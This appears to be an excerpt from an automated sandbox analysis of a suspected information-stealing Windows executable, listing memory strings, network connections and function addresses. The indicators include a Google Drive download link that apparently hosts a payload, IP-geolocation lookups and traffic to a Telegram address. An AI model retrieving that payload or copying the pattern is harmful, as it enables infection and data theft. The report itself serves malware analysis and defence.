            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334F1000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334E2000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en0l
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/8TH
            Source: GBYfjUz4a5.exe, 00000007.00000002.2483008488.0000000004950000.00000004.00001000.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v4YV
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000003.1759201605.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000003.1759201605.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/-
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v&export=download
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v&export=downloadi)
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v&export=downloadk)
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000333AD000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003341D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000333AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003341D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003341D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033513000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/0l
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/4
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003351D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49689
            Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
            Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49692
            Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
            Source: unknown | Network traffic detected: HTTP traffic on port 49689 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.6:49689 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49690 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49708 version: TLS 1.2
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_004052D1
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess | 0_2_00403358
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess | 7_2_00403358
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Windows\resources\0809
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_00404B0E | 0_2_00404B0E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_0040653D | 0_2_0040653D
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_00404B0E | 7_2_00404B0E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_0040653D | 7_2_0040653D
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDD278 | 7_2_02BDD278
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BD5370 | 7_2_02BD5370
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDC146 | 7_2_02BDC146
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BD76F1 | 7_2_02BD76F1
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDC738 | 7_2_02BDC738
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BD6498 | 7_2_02BD6498
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDC468 | 7_2_02BDC468
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDD548 | 7_2_02BDD548
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDCA08 | 7_2_02BDCA08
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDE988 | 7_2_02BDE988
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDF961 | 7_2_02BDF961
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDCFAB | 7_2_02BDCFAB
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BD6FC8 | 7_2_02BD6FC8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDCCD8 | 7_2_02BDCCD8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BD9DE0 | 7_2_02BD9DE0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDB0B8 | 7_2_02BDB0B8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BD29E0 | 7_2_02BD29E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BDE97B | 7_2_02BDE97B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BD3E09 | 7_2_02BD3E09
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA8FB0 | 7_2_02DA8FB0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA7B78 | 7_2_02DA7B78
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA38B8 | 7_2_02DA38B8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA81D0 | 7_2_02DA81D0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA4ED0 | 7_2_02DA4ED0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA72C8 | 7_2_02DA72C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA4EC0 | 7_2_02DA4EC0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA22F0 | 7_2_02DA22F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAF2F0 | 7_2_02DAF2F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA1E98 | 7_2_02DA1E98
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAAE90 | 7_2_02DAAE90
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DACE80 | 7_2_02DACE80
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA72B8 | 7_2_02DA72B8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA1EA8 | 7_2_02DA1EA8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAEE5F | 7_2_02DAEE5F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA1A50 | 7_2_02DA1A50
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA1A41 | 7_2_02DA1A41
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA4A78 | 7_2_02DA4A78
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAAE7F | 7_2_02DAAE7F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA6E72 | 7_2_02DA6E72
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA6E70 | 7_2_02DA6E70
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAEE70 | 7_2_02DAEE70
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DACE6F | 7_2_02DACE6F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA6A18 | 7_2_02DA6A18
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA4610 | 7_2_02DA4610
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAAA00 | 7_2_02DAAA00
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA6A07 | 7_2_02DA6A07
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA4620 | 7_2_02DA4620
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA5BD8 | 7_2_02DA5BD8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA97C0 | 7_2_02DA97C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA2FF9 | 7_2_02DA2FF9
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAF790 | 7_2_02DAF790
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAD791 | 7_2_02DAD791
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA5780 | 7_2_02DA5780
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAF781 | 7_2_02DAF781
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA2BB0 | 7_2_02DA2BB0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAB7B0 | 7_2_02DAB7B0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA97B0 | 7_2_02DA97B0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA2BAB | 7_2_02DA2BAB
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAD7A0 | 7_2_02DAD7A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAB7A0 | 7_2_02DAB7A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA8FA1 | 7_2_02DA8FA1
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA2758 | 7_2_02DA2758
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA2749 | 7_2_02DA2749
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA7B73 | 7_2_02DA7B73
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA5770 | 7_2_02DA5770
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAD310 | 7_2_02DAD310
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAB310 | 7_2_02DAB310
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA2300 | 7_2_02DA2300
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAF300 | 7_2_02DAF300
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAD300 | 7_2_02DAD300
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA5328 | 7_2_02DA5328
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA7722 | 7_2_02DA7722
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA7720 | 7_2_02DA7720
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAB320 | 7_2_02DAB320
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAC0D0 | 7_2_02DAC0D0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAA0D0 | 7_2_02DAA0D0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAE0C0 | 7_2_02DAE0C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAC0C0 | 7_2_02DAC0C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA08F0 | 7_2_02DA08F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAA0E0 | 7_2_02DAA0E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA08E0 | 7_2_02DA08E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA0498 | 7_2_02DA0498
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA6488 | 7_2_02DA6488
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAE0B0 | 7_2_02DAE0B0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA9C50 | 7_2_02DA9C50
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA3457 | 7_2_02DA3457
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA0040 | 7_2_02DA0040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DABC40 | 7_2_02DABC40
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA3460 | 7_2_02DA3460
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DADC1F | 7_2_02DADC1F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA3008 | 7_2_02DA3008
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA0007 | 7_2_02DA0007
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA9C3F | 7_2_02DA9C3F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA6030 | 7_2_02DA6030
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DADC30 | 7_2_02DADC30
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DABC2F | 7_2_02DABC2F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAFC20 | 7_2_02DAFC20
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA6021 | 7_2_02DA6021
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAE9D0 | 7_2_02DAE9D0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA15F8 | 7_2_02DA15F8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAC9F0 | 7_2_02DAC9F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAA9F0 | 7_2_02DAA9F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA15E8 | 7_2_02DA15E8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAE9E0 | 7_2_02DAE9E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAC9E0 | 7_2_02DAC9E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA1193 | 7_2_02DA1193
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA11A0 | 7_2_02DA11A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAA55F | 7_2_02DAA55F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAE550 | 7_2_02DAE550
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA0D48 | 7_2_02DA0D48
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAC54F | 7_2_02DAC54F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAE540 | 7_2_02DAE540
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAA570 | 7_2_02DAA570
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DAC560 | 7_2_02DAC560
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E18E88 | 7_2_02E18E88
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E14B98 | 7_2_02E14B98
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E14478 | 7_2_02E14478
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E16848 | 7_2_02E16848
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E19CE0 | 7_2_02E19CE0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1C7E0 | 7_2_02E1C7E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1F2E0 | 7_2_02E1F2E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E184E7 | 7_2_02E184E7
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E13FE8 | 7_2_02E13FE8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1C7E8 | 7_2_02E1C7E8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E11FE8 | 7_2_02E11FE8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E159F0 | 7_2_02E159F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1F2F0 | 7_2_02E1F2F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1AFF3 | 7_2_02E1AFF3
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E11FF8 | 7_2_02E11FF8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E184F8 | 7_2_02E184F8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1DAF8 | 7_2_02E1DAF8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E189C0 | 7_2_02E189C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E136C8 | 7_2_02E136C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1B4C8 | 7_2_02E1B4C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E171C8 | 7_2_02E171C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E116CB | 7_2_02E116CB
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1DFD0 | 7_2_02E1DFD0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E19CD7 | 7_2_02E19CD7
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E116D8 | 7_2_02E116D8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E171D8 | 7_2_02E171D8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E13FD8 | 7_2_02E13FD8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E159DF | 7_2_02E159DF
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E176A0 | 7_2_02E176A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1CCA0 | 7_2_02E1CCA0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1F7A7 | 7_2_02E1F7A7
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E12DA8 | 7_2_02E12DA8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E1A1A8 | 7_2_02E1A1A8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E15EA8 | 7_2_02E15EA8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E10DAB | 7_2_02E10DAB
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E189B1 | 7_2_02E189B1
